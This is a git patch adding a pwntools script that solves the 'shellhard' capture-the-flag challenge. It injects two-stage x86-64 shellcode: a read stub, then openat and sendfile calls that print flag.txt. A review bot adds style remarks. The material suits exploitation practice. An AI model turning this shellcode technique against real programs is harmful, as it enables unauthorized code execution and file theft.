From f03955debcd2f9e5623e146298b8d2084fcd97d7 Mon Sep 17 00:00:00 2001
From: jc
Date: Wed, 27 Nov 2024 22:11:05 +0300
Subject: [PATCH] solve script

---
 random_challs/shellhard/a.py | 38 ++++++++++++++++++++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 random_challs/shellhard/a.py

diff --git a/random_challs/shellhard/a.py b/random_challs/shellhard/a.py
new file mode 100644
index 0000000..b89b722
--- /dev/null
+++ b/random_challs/shellhard/a.py
@@ -0,0 +1,38 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./shellhard", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+
+# stage 1
+sc = """
+mov rsi, rdx
+cqo
+mov dl, 0xff
+syscall
+"""
+sc = asm(sc)
+s(sc)
+
+# stage 2
+sc = """
+lea rsi, [rcx+48]
+mov edi, -100
+xor rdx, rdx
+xor r10, r10
+mov rax, 257
+syscall
+mov rsi, rax
+mov rdi, 1
+add r10b, 0xff
+mov rax, 40
+syscall
+"""
+sc = b"\x90"*10 + asm(sc) + b"flag.txt\0"
+s(sc)
+
+r.interactive()
\ No newline at end of file
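Review bot: The helper under `# funcs` assigns a lambda to a name, which PEP 8 (E731) discourages; `def s(a): return r.sendlineafter(b": ", a)` is the same behavior with a proper function name in tracebacks. The file also ends without a trailing newline, as the `\ No newline at end of file` marker shows. A one-line module docstring stating which challenge binary the script is written for would help, since the two blocks are labelled only `# stage 1` and `# stage 2` and the `./shellhard` path is otherwise the only hint.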